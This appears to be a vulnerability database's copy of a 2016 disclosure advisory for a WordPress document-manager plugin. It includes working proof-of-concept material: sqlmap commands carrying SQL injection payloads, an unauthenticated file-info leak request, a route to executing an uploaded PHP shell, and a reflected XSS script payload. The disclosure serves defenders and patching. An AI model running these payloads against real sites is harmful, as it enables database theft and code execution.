Vulners
Lucene search
WordPress SP Projects And Document Manager 2.5.9.6 XSS / SQL Injection
🗓️ 07 Mar 2016 00:00:00Reported by Michael HelwigType 
packetstorm🔗 packetstormsecurity.com👁 30 Views
`* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
* Discovery Date: 2016/01/13
* Public Disclosure Date: 2016/03/06
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Vendor Homepage: http://smartypantsplugins.com/
* Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/
* Version: 2.5.9.6
* Tested on: WordPress 4.4.1
* Category: webapps
Description
===============================================================================
The Wordpress plugin "SP Projects & Document Manager" contains several
vulnerabilities: arbitrary file upload and code execution by registered users,
sql injections, information leakage and xss by unregistered users.
PoC
===============================================================================
1. SQL-Injections
~~~~~~~~~~~~~~~~~~~
Several SQL injections have been known in version 2.4.1 but have been fixed in between.
At least two of them reappeared in version 2.5.9.6:
- The injections in the "id"-parameter on
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/
ajax.php?function=download-project&id=1
- and the POST-Parameter vendor_email on
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/
ajax.php?function=email-vendor
See https://packetstormsecurity.com/files/129212/\
WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html
for the original information on this.
Both injections can be exploited by sqlmap:
[1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
-manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql
[2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
-manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) \
OR (1=1 *" --dbms mysql
2. Arbitrary code executions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET
request to their specific location in the default upload path (which can vary
depending on the configuration of the plugin). The URL to uploaded files typically
looks like
/wp-content/uploads/sp-client-document-manager/[UPLOADER-ID]/[FILE]
e.g.
http://wordpress.local.de/wp-content/uploads/sp-client-document-manager\
/1/shell.php
Files can even be accessed directly if the option "Require Login to Download"
is checked in the plugin configuration.
3. Information leakage
~~~~~~~~~~~~~~~~~~~~~~~
Information about uploaded files can be retrieved by non-logged in users via a
call to admin/ajax.php:
-----------------------
GET http://wordpress.local.de/wp-content/plugins/sp-client-document-manager\
/admin/ajax.php?function=get-file-info&id=1
-- response --
200 OK
Date: Wed, 13 Jan 2016 22:17:46 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 211
Connection: close
Content-Type: application/json
{"id":"1","name":"in.php","file":"index.php","notes":"","tags":"","uid":"1",\
"cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0",\
"form_id":"0","entry_id":"0","group_id":"0","client_id":"0"}
---------------
Specifically you can retrieve info about the upload user id and filename
to determine the URL for direct access to the file (see 3).
4. XSS Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~
There is a (non-persistent) XSS vulnerability in the admin/ajax.php file
for function=email-vendor:
---------------
POST http://wordpress.local.de/wp-content/plugins/sp-client-document-manager\
/admin/ajax.php?function=email-vendor
Content-Type: application/x-www-form-urlencoded
vendor_email[]=1&vendor=<script>alert(1);</script>
-- response --
200 OK
Date: Sun, 06 Mar 2016 10:00:30 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 101
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);\
</script></p>
---------------
Timeline
===============================================================================
2016/01/13 - Issues discovered
2016/01/14 - Issues reported to vendor via contact form on his website
2016/01/27 - No response from vendor; WordPress security team notified
2016/01/29 - Reply from Wordpress security team
2016/03/02 - Vendor released security update 2.6.0.0 - issues fixed
Solution
===============================================================================
Update to latest version
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Mar 2016 00:00Current
0.6Low risk
Vulners AI Score0.6